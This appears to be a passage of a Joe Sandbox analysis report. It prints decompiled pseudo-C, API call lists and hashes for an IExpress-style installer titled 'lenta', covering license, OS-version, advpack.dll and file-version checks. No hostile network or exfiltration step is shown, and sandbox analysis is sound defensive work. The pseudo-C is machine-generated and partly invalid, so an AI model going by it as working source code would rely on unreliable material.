                              • RegQueryValueExA.ADVAPI32(?,00A71140,00000000,?,?,0000000C), ref: 00A768F4
                              • RegCloseKey.ADVAPI32(?), ref: 00A76902
                                • Part of subcall function 00A766F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,00A7691A), ref: 00A76741
                              Strings
                              • Control Panel\Desktop\ResourceLocale, xrefs: 00A768C2
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                              • String ID: Control Panel\Desktop\ResourceLocale
                              • API String ID: 3346862599-1109908249
                              • Opcode ID: ed5ff77cf9796135cfa8ec9885f33ad22292ee66dc6c2e5b35352d43584e3c1b
                              • Instruction ID: 697920ad60252897c7986db9bc0dc10d7b99df48695d388805e2a0ffa322174e
                              • Opcode Fuzzy Hash: ed5ff77cf9796135cfa8ec9885f33ad22292ee66dc6c2e5b35352d43584e3c1b
                              • Instruction Fuzzy Hash: EE319531A00618EFDB31CB52CC04BAA77BCFB45714F00C5A5EA4DA6240DB309D86CF52
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A73A3F(void* __eflags) {
                              				void* _t3;
                              				void* _t9;
                              				CHAR* _t16;
                              
                              				_t16 = "LICENSE";
                              				_t1 = E00A7468F(_t16, 0, 0) + 1; // 0x1
                              				_t3 = LocalAlloc(0x40, _t1);
                              				 *0xa78d4c = _t3;
                              				if(_t3 != 0) {
                              					_t19 = _t16;
                              					if(E00A7468F(_t16, _t3, _t28) != 0) {
                              						if(lstrcmpA( *0xa78d4c, "<None>") == 0) {
                              							LocalFree( *0xa78d4c);
                              							L9:
                              							 *0xa79124 = 0;
                              							return 1;
                              						}
                              						_t9 = E00A76517(_t19, 0x7d1, 0, E00A73100, 0, 0);
                              						LocalFree( *0xa78d4c);
                              						if(_t9 != 0) {
                              							goto L9;
                              						}
                              						 *0xa79124 = 0x800704c7;
                              						L2:
                              						return 0;
                              					}
                              					E00A744B9(0, 0x4b1, 0, 0, 0x10, 0);
                              					LocalFree( *0xa78d4c);
                              					 *0xa79124 = 0x80070714;
                              					goto L2;
                              				}
                              				E00A744B9(0, 0x4b5, 0, 0, 0x10, 0);
                              				 *0xa79124 = E00A76285();
                              				goto L2;
                              			}







                              APIs
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746A0
                                • Part of subcall function 00A7468F: SizeofResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746A9
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746C3
                                • Part of subcall function 00A7468F: LoadResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746CC
                                • Part of subcall function 00A7468F: LockResource.KERNEL32(00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746D3
                                • Part of subcall function 00A7468F: memcpy_s.MSVCRT ref: 00A746E5
                                • Part of subcall function 00A7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746EF
                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00A72F64,?,00000002,00000000), ref: 00A73A5D
                              • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00A73AB3
                                • Part of subcall function 00A744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A74518
                                • Part of subcall function 00A744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A74554
                                • Part of subcall function 00A76285: GetLastError.KERNEL32(00A75BBC), ref: 00A76285
                              • lstrcmpA.KERNEL32(<None>,00000000), ref: 00A73AD0
                              • LocalFree.KERNEL32 ref: 00A73B13
                                • Part of subcall function 00A76517: FindResourceA.KERNEL32(00A70000,000007D6,00000005), ref: 00A7652A
                                • Part of subcall function 00A76517: LoadResource.KERNEL32(00A70000,00000000,?,?,00A72EE8,00000000,00A719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A76538
                                • Part of subcall function 00A76517: DialogBoxIndirectParamA.USER32(00A70000,00000000,00000547,00A719E0,00000000), ref: 00A76557
                                • Part of subcall function 00A76517: FreeResource.KERNEL32(00000000,?,?,00A72EE8,00000000,00A719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A76560
                              • LocalFree.KERNEL32(00000000,00A73100,00000000,00000000), ref: 00A73AF4
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                              • String ID: <None>$LICENSE
                              • API String ID: 2414642746-383193767
                              • Opcode ID: 9a0f31d0403695e388444e87019b30afbab03badd3c8842a507b2481f1bb66c6
                              • Instruction ID: 6447b4d2833547752c0735035b144aa02dd31fb67bc2ddacb43508360bc0029e
                              • Opcode Fuzzy Hash: 9a0f31d0403695e388444e87019b30afbab03badd3c8842a507b2481f1bb66c6
                              • Instruction Fuzzy Hash: 0B11DA323402017BDB20DFB29D09E1B3AB9DBD9B50B11C53EB94DD51A1DB7D88429664
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E00A724E0(void* __ebx) {
                              				signed int _v8;
                              				char _v268;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t7;
                              				void* _t20;
                              				long _t26;
                              				signed int _t27;
                              
                              				_t20 = __ebx;
                              				_t7 =  *0xa78004; // 0x74742267
                              				_v8 = _t7 ^ _t27;
                              				_t25 = 0x104;
                              				_t26 = 0;
                              				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                              					E00A7658A( &_v268, 0x104, "wininit.ini");
                              					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                              					_t25 = _lopen( &_v268, 0x40);
                              					if(_t25 != 0xffffffff) {
                              						_t26 = _llseek(_t25, 0, 2);
                              						_lclose(_t25);
                              					}
                              				}
                              				return E00A76CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                              			}












                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00A72506
                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00A7252C
                              • _lopen.KERNEL32 ref: 00A7253B
                              • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00A7254C
                              • _lclose.KERNEL32(00000000), ref: 00A72555
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                              • String ID: wininit.ini
                              • API String ID: 3273605193-4206010578
                              • Opcode ID: acae0b6c8ba944dab5e73cc8e4e01c37fa7b6efebf8dd7a3a1001a7df5265521
                              • Instruction ID: b44bcd4994cb1ff5262b0a62b5d7853ef75e883a7641909bb66b73d57a4b02ac
                              • Opcode Fuzzy Hash: acae0b6c8ba944dab5e73cc8e4e01c37fa7b6efebf8dd7a3a1001a7df5265521
                              • Instruction Fuzzy Hash: 2D019E326001187BC720DBA99C0CEDFBBBDEB95760F008565FA4DD3190DA748E878AA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E00A736EE(CHAR* __ecx) {
                              				signed int _v8;
                              				char _v268;
                              				struct _OSVERSIONINFOA _v416;
                              				signed int _v420;
                              				signed int _v424;
                              				CHAR* _v428;
                              				CHAR* _v432;
                              				signed int _v436;
                              				CHAR* _v440;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t72;
                              				CHAR* _t77;
                              				CHAR* _t91;
                              				CHAR* _t94;
                              				int _t97;
                              				CHAR* _t98;
                              				signed char _t99;
                              				CHAR* _t104;
                              				signed short _t107;
                              				signed int _t109;
                              				short _t113;
                              				void* _t114;
                              				signed char _t115;
                              				short _t119;
                              				CHAR* _t123;
                              				CHAR* _t124;
                              				CHAR* _t129;
                              				signed int _t131;
                              				signed int _t132;
                              				CHAR* _t135;
                              				CHAR* _t138;
                              				signed int _t139;
                              
                              				_t72 =  *0xa78004; // 0x74742267
                              				_v8 = _t72 ^ _t139;
                              				_v416.dwOSVersionInfoSize = 0x94;
                              				_t115 = __ecx;
                              				_t135 = 0;
                              				_v432 = __ecx;
                              				_t138 = 0;
                              				if(GetVersionExA( &_v416) != 0) {
                              					_t133 = _v416.dwMajorVersion;
                              					_t119 = 2;
                              					_t77 = _v416.dwPlatformId - 1;
                              					__eflags = _t77;
                              					if(_t77 == 0) {
                              						_t119 = 0;
                              						__eflags = 1;
                              						 *0xa78184 = 1;
                              						 *0xa78180 = 1;
                              						L13:
                              						 *0xa79a40 = _t119;
                              						L14:
                              						__eflags =  *0xa78a34 - _t138; // 0x0
                              						if(__eflags != 0) {
                              							goto L66;
                              						}
                              						__eflags = _t115;
                              						if(_t115 == 0) {
                              							goto L66;
                              						}
                              						_v428 = _t135;
                              						__eflags = _t119;
                              						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                              						_t11 =  &_v420;
                              						 *_t11 = _v420 & _t138;
                              						__eflags =  *_t11;
                              						_v440 = _t115;
                              						do {
                              							_v424 = _t135 * 0x18;
                              							_v436 = E00A72A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                              							_t91 = E00A72A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                              							_t123 = _v436;
                              							_t133 = 0x54d;
                              							__eflags = _t123;
                              							if(_t123 < 0) {
                              								L32:
                              								__eflags = _v420 - 1;
                              								if(_v420 == 1) {
                              									_t138 = 0x54c;
                              									L36:
                              									__eflags = _t138;
                              									if(_t138 != 0) {
                              										L40:
                              										__eflags = _t138 - _t133;
                              										if(_t138 == _t133) {
                              											L30:
                              											_v420 = _v420 & 0x00000000;
                              											_t115 = 0;
                              											_v436 = _v436 & 0x00000000;
                              											__eflags = _t138 - _t133;
                              											_t133 = _v432;
                              											if(__eflags != 0) {
                              												_t124 = _v440;
                              											} else {
                              												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                              												_v420 =  &_v268;
                              											}
                              											__eflags = _t124;
                              											if(_t124 == 0) {
                              												_t135 = _v436;
                              											} else {
                              												_t99 = _t124[0x30];
                              												_t135 = _t124[0x34] + 0x84 + _t133;
                              												__eflags = _t99 & 0x00000001;
                              												if((_t99 & 0x00000001) == 0) {
                              													asm("sbb ebx, ebx");
                              													_t115 =  ~(_t99 & 2) & 0x00000101;
                              												} else {
                              													_t115 = 0x104;
                              												}
                              											}
                              											__eflags =  *0xa78a38 & 0x00000001;
                              											if(( *0xa78a38 & 0x00000001) != 0) {
                              												L64:
                              												_push(0);
                              												_push(0x30);
                              												_push(_v420);
                              												_push("lenta");
                              												goto L65;
                              											} else {
                              												__eflags = _t135;
                              												if(_t135 == 0) {
                              													goto L64;
                              												}
                              												__eflags =  *_t135;
                              												if( *_t135 == 0) {
                              													goto L64;
                              												}
                              												MessageBeep(0);
                              												_t94 = E00A7681F(_t115);
                              												__eflags = _t94;
                              												if(_t94 == 0) {
                              													L57:
                              													0x180030 = 0x30;
                              													L58:
                              													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
                              													__eflags = _t115 & 0x00000004;
                              													if((_t115 & 0x00000004) == 0) {
                              														__eflags = _t115 & 0x00000001;
                              														if((_t115 & 0x00000001) == 0) {
                              															goto L66;
                              														}
                              														__eflags = _t97 - 1;
                              														L62:
                              														if(__eflags == 0) {
                              															_t138 = 0;
                              														}
                              														goto L66;
                              													}
                              													__eflags = _t97 - 6;
                              													goto L62;
                              												}
                              												_t98 = E00A767C9(_t124, _t124);
                              												__eflags = _t98;
                              												if(_t98 == 0) {
                              													goto L57;
                              												}
                              												goto L58;
                              											}
                              										}
                              										__eflags = _t138 - 0x54c;
                              										if(_t138 == 0x54c) {
                              											goto L30;
                              										}
                              										__eflags = _t138;
                              										if(_t138 == 0) {
                              											goto L66;
                              										}
                              										_t135 = 0;
                              										__eflags = 0;
                              										goto L44;
                              									}
                              									L37:
                              									_t129 = _v432;
                              									__eflags = _t129[0x7c];
                              									if(_t129[0x7c] == 0) {
                              										goto L66;
                              									}
                              									_t133 =  &_v268;
                              									_t104 = E00A728E8(_t129,  &_v268, _t129,  &_v428);
                              									__eflags = _t104;
                              									if(_t104 != 0) {
                              										goto L66;
                              									}
                              									_t135 = _v428;
                              									_t133 = 0x54d;
                              									_t138 = 0x54d;
                              									goto L40;
                              								}
                              								goto L33;
                              							}
                              							__eflags = _t91;
                              							if(_t91 > 0) {
                              								goto L32;
                              							}
                              							__eflags = _t123;
                              							if(_t123 != 0) {
                              								__eflags = _t91;
                              								if(_t91 != 0) {
                              									goto L37;
                              								}
                              								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                              								L27:
                              								if(__eflags <= 0) {
                              									goto L37;
                              								}
                              								L28:
                              								__eflags = _t135;
                              								if(_t135 == 0) {
                              									goto L33;
                              								}
                              								_t138 = 0x54c;
                              								goto L30;
                              							}
                              							__eflags = _t91;
                              							_t107 = _v416.dwBuildNumber;
                              							if(_t91 != 0) {
                              								_t131 = _v424;
                              								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                              								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                              									goto L37;
                              								}
                              								goto L28;
                              							}
                              							_t132 = _t107 & 0x0000ffff;
                              							_t109 = _v424;
                              							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                              							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                              								goto L28;
                              							}
                              							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                              							goto L27;
                              							L33:
                              							_t135 =  &(_t135[1]);
                              							_v428 = _t135;
                              							_v420 = _t135;
                              							__eflags = _t135 - 2;
                              						} while (_t135 < 2);
                              						goto L36;
                              					}
                              					__eflags = _t77 == 1;
                              					if(_t77 == 1) {
                              						 *0xa79a40 = _t119;
                              						 *0xa78184 = 1;
                              						 *0xa78180 = 1;
                              						__eflags = _t133 - 3;
                              						if(_t133 > 3) {
                              							__eflags = _t133 - 5;
                              							if(_t133 < 5) {
                              								goto L14;
                              							}
                              							_t113 = 3;
                              							_t119 = _t113;
                              							goto L13;
                              						}
                              						_t119 = 1;
                              						_t114 = 3;
                              						 *0xa79a40 = 1;
                              						__eflags = _t133 - _t114;
                              						if(__eflags < 0) {
                              							L9:
                              							 *0xa78184 = _t135;
                              							 *0xa78180 = _t135;
                              							goto L14;
                              						}
                              						if(__eflags != 0) {
                              							goto L14;
                              						}
                              						__eflags = _v416.dwMinorVersion - 0x33;
                              						if(_v416.dwMinorVersion >= 0x33) {
                              							goto L14;
                              						}
                              						goto L9;
                              					}
                              					_t138 = 0x4ca;
                              					goto L44;
                              				} else {
                              					_t138 = 0x4b4;
                              					L44:
                              					_push(_t135);
                              					_push(0x10);
                              					_push(_t135);
                              					_push(_t135);
                              					L65:
                              					_t133 = _t138;
                              					E00A744B9(0, _t138);
                              					L66:
                              					return E00A76CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                              				}
                              			}






































                              APIs
                              • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00A73723
                              • MessageBeep.USER32(00000000), ref: 00A739C3
                              • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 00A739F1
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Message$BeepVersion
                              • String ID: 3$lenta
                              • API String ID: 2519184315-4216304122
                              • Opcode ID: 85183e6610ab98390c5d373839b018ebabdb2db30035983d9607f32c351f2074
                              • Instruction ID: 9d6e064fdcf80da8a6393a9eaafd59d6c960ae46bcbe7f635aa7cc74fd39531d
                              • Opcode Fuzzy Hash: 85183e6610ab98390c5d373839b018ebabdb2db30035983d9607f32c351f2074
                              • Instruction Fuzzy Hash: 37910473B012149FEF34CB25CD91BAAB3B0AB85340F16C1A9D98D97251D7718F81EB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 83%
                              			E00A76495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                              				signed int _v8;
                              				char _v268;
                              				void* __edi;
                              				signed int _t9;
                              				signed char _t14;
                              				struct HINSTANCE__* _t15;
                              				void* _t18;
                              				CHAR* _t26;
                              				void* _t27;
                              				signed int _t28;
                              
                              				_t27 = __esi;
                              				_t18 = __ebx;
                              				_t9 =  *0xa78004; // 0x74742267
                              				_v8 = _t9 ^ _t28;
                              				_push(__ecx);
                              				E00A71781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                              				_t26 = "advpack.dll";
                              				E00A7658A( &_v268, 0x104, _t26);
                              				_t14 = GetFileAttributesA( &_v268);
                              				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                              					_t15 = LoadLibraryA(_t26);
                              				} else {
                              					_t15 = LoadLibraryExA( &_v268, 0, 8);
                              				}
                              				return E00A76CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                              			}














                              APIs
                              • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00A764DF
                              • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00A764F9
                              • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 00A76502
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: LibraryLoad$AttributesFile
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                              • API String ID: 438848745-875882553
                              • Opcode ID: b2642502bf26188fe7591608397a3f1f8bbb65de842055b4f2020f976e39c867
                              • Instruction ID: 3d61049b7bc2c1b535383eacc0f5af08617d9ad377260aabb3324fa306306db9
                              • Opcode Fuzzy Hash: b2642502bf26188fe7591608397a3f1f8bbb65de842055b4f2020f976e39c867
                              • Instruction Fuzzy Hash: 6B01D130A00108ABDB50DBB4DC49BEE7378EBA0311F90C699F58D921C0DF709ECB8A51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A728E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                              				void* _v8;
                              				char* _v12;
                              				intOrPtr _v16;
                              				void* _v20;
                              				intOrPtr _v24;
                              				int _v28;
                              				int _v32;
                              				void* _v36;
                              				int _v40;
                              				void* _v44;
                              				intOrPtr _v48;
                              				intOrPtr _v52;
                              				intOrPtr _v56;
                              				intOrPtr _v60;
                              				intOrPtr _v64;
                              				long _t68;
                              				void* _t70;
                              				void* _t73;
                              				void* _t79;
                              				void* _t83;
                              				void* _t87;
                              				void* _t88;
                              				intOrPtr _t93;
                              				intOrPtr _t97;
                              				intOrPtr _t99;
                              				int _t101;
                              				void* _t103;
                              				void* _t106;
                              				void* _t109;
                              				void* _t110;
                              
                              				_v12 = __edx;
                              				_t99 = __ecx;
                              				_t106 = 0;
                              				_v16 = __ecx;
                              				_t87 = 0;
                              				_t103 = 0;
                              				_v20 = 0;
                              				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                              					L19:
                              					_t106 = 1;
                              				} else {
                              					_t62 = 0;
                              					_v8 = 0;
                              					while(1) {
                              						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                              						if(E00A72773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                              							goto L20;
                              						}
                              						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                              						_v28 = _t68;
                              						if(_t68 == 0) {
                              							_t99 = _v16;
                              							_t70 = _v8 + _t99;
                              							_t93 = _v24;
                              							_t87 = _v20;
                              							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                              								goto L18;
                              							}
                              						} else {
                              							_t103 = GlobalAlloc(0x42, _t68);
                              							if(_t103 != 0) {
                              								_t73 = GlobalLock(_t103);
                              								_v36 = _t73;
                              								if(_t73 != 0) {
                              									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                              										L15:
                              										GlobalUnlock(_t103);
                              										_t99 = _v16;
                              										L18:
                              										_t87 = _t87 + 1;
                              										_t62 = _v8 + 0x3c;
                              										_v20 = _t87;
                              										_v8 = _v8 + 0x3c;
                              										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                              											continue;
                              										} else {
                              											goto L19;
                              										}
                              									} else {
                              										_t79 = _v44;
                              										_t88 = _t106;
                              										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                              										_t101 = _v28;
                              										_v48 =  *((intOrPtr*)(_t79 + 8));
                              										_t83 = _v8 + _v16 + _v24 + 0x94;
                              										_t97 = _v48;
                              										_v36 = _t83;
                              										_t109 = _t83;
                              										do {
                              											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00A72A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                              											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00A72A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                              											_t109 = _t109 + 0x18;
                              											_t88 = _t88 + 4;
                              										} while (_t88 < 8);
                              										_t87 = _v20;
                              										_t106 = 0;
                              										if(_v56 < 0 || _v64 > 0) {
                              											if(_v52 < _t106 || _v60 > _t106) {
                              												GlobalUnlock(_t103);
                              											} else {
                              												goto L15;
                              											}
                              										} else {
                              											goto L15;
                              										}
                              									}
                              								}
                              							}
                              						}
                              						goto L20;
                              					}
                              				}
                              				L20:
                              				 *_a8 = _t87;
                              				if(_t103 != 0) {
                              					GlobalFree(_t103);
                              				}
                              				return _t106;
                              			}

                              APIs
                              • GlobalFree.KERNEL32 ref: 00A72A6F
                                • Part of subcall function 00A72773: CharUpperA.USER32(74742267,00000000,00000000,00000000), ref: 00A727A8
                                • Part of subcall function 00A72773: CharNextA.USER32(0000054D), ref: 00A727B5
                                • Part of subcall function 00A72773: CharNextA.USER32(00000000), ref: 00A727BC
                                • Part of subcall function 00A72773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A72829
                                • Part of subcall function 00A72773: RegQueryValueExA.ADVAPI32(?,00A71140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A72852
                                • Part of subcall function 00A72773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A72870
                                • Part of subcall function 00A72773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A728A0
                              • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00A73938,?,?,?,?,-00000005), ref: 00A72958
                              • GlobalLock.KERNEL32 ref: 00A72969
                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A73938,?,?,?,?,-00000005,?), ref: 00A72A21
                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00A72A81
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                              • String ID:
                              • API String ID: 3949799724-0
                              • Opcode ID: db5ce075f17af01057bb52b28d492f6c409eb80da93fd254c044c2780154d87b
                              • Instruction ID: 070fccf07f0ff72ef8f8da31ba96e4c5788fab72a37bdd73b8b96db50218c0d5
                              • Opcode Fuzzy Hash: db5ce075f17af01057bb52b28d492f6c409eb80da93fd254c044c2780154d87b
                              • Instruction Fuzzy Hash: 18512A31E00219EFCB21CF98CC84AAEBBB5FF48740F14C02AE909E3251DB319941DB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 32%
                              			E00A74169(void* __eflags) {
                              				int _t18;
                              				void* _t21;
                              
                              				_t20 = E00A7468F("FINISHMSG", 0, 0);
                              				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                              				if(_t21 != 0) {
                              					if(E00A7468F("FINISHMSG", _t21, _t20) != 0) {
                              						if(lstrcmpA(_t21, "<None>") == 0) {
                              							L7:
                              							return LocalFree(_t21);
                              						}
                              						_push(0);
                              						_push(0x40);
                              						_push(0);
                              						_push(_t21);
                              						_t18 = 0x3e9;
                              						L6:
                              						E00A744B9(0, _t18);
                              						goto L7;
                              					}
                              					_push(0);
                              					_push(0x10);
                              					_push(0);
                              					_push(0);
                              					_t18 = 0x4b1;
                              					goto L6;
                              				}
                              				return E00A744B9(0, 0x4b5, 0, 0, 0x10, 0);
                              			}

                              APIs
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746A0
                                • Part of subcall function 00A7468F: SizeofResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746A9
                                • Part of subcall function 00A7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A746C3
                                • Part of subcall function 00A7468F: LoadResource.KERNEL32(00000000,00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746CC
